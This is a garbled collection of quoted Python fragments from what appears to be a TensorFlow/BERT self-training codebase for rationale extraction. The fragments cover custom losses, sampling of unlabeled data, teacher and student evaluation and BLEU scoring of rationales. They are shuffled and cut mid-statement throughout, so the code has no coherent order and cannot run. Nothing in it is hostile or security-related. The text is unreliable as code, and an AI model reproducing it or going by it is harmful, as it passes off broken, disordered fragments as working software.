np.full((len(y_dev), len(labels)), 1/len(labels))", "prediction data on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp", "= np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif", "r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample", "y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint,", "out[4], out[5] logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info", "logger.info(\"BLEU-1 score of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score", "{}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) 
{}\".format(test_task_acc)) if test_task_acc", "'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier':", "type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat =", "= model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc,", "0. max_best_acc = 0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test))", "{}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch,", "test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out =", "times with different initialization to select best base model based on validation loss", "{}'.format(gpus)) #run the base model n times with different initialization to select best", "axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc,", "Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None,", "model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, 
attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0,", "loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'],", "metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch,", "def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None", "average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], []", "verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0]", "restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ :", "\"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size],", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], 
verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0],", "sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob,", "as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for", "examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_:", "np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_'", "model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(),", "elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif", "max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev,", "'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': 
tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"),", "'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size],", "on student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0,", "data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict()", "os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc =", "custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r']", "axis=-1) #compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating", "#, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint'", "open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None # model_task for", "out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, 
axis=-1)", "= [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier':", "= [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0,", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "loss best_base_model = None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10", "y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test,", "os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if", "'''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ ==", "{}: {}\".format(best_validation_loss, model.evaluate(X_dev, 
[y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved", "y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def", "test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task =", "truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data", "on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0,", "= np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance", "X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0)", "out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc))", "= np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp)", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test,", "= os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, 
sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file))", "y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev,", "logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3,", "if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\")", "= [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0,", "type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0],", "val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif", "'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] =", "unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels", "model.evaluate(X_test, [y_test[:,0], 
y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg'", "task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0],", "\"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint'", "token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc", "skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1", "elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)),", "set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student", "select best base model based on validation loss best_base_model = None best_validation_loss =", "i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) >", "elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss", "open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all", "0)) score2 += 
nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0,", "y_test[i][j+1] == 1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1 +=", "0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model): {}", "type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp))", "\".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4", "j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j])", "unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample,", "= val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation", "{}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in", "if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct)", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set", "len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)),", "not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']),", "random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for", "cce_loss + 
0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return", "X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg']", "type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss',", "y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus,", "= model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in type_:", "len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch =", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout,", "1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are", "{}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred)", "= 
tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1]", "(\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not", "in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth']", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train,", "= np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0],", "if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc", "the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "on {} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices =", "(y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r))", "f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels))", "= 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that", "import shuffle from 
transformers import * import logging import math import models import", "truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in", "y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls", "in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0]", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout,", "= np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_:", "= np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1)", "= np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64)", "np import os, sys import json import nltk import tensorflow as tf import", "model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc,", "= 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\":", "#+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0,", "numpy as np import os, sys import json import nltk import tensorflow as", "the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+=", "model_file = os.path.join(model_dir, 
\"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if", "y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss", "> max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3]", "\".format(score4/len(pred))) best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text =", "model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5,", "out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred =", "import os, sys import json import nltk import tensorflow as tf import tensorflow.keras", "axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices", "acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float')", "log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']),", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob)", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info 
(\"Val acc (task) {}\".format(task_acc)) max_task_acc", "0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss = 0.", "y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\")", "in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc =", "to select best base model based on validation loss best_base_model = None best_validation_loss", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0],", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number", "for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 +=", "Self-training for Rationale using few-shot learning. 
This code base is adapted from UST", "logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1,", "best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev,", "if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus))", "i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for", "= np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]),", "'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2]", "(\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student =", "= np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]},", "type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, 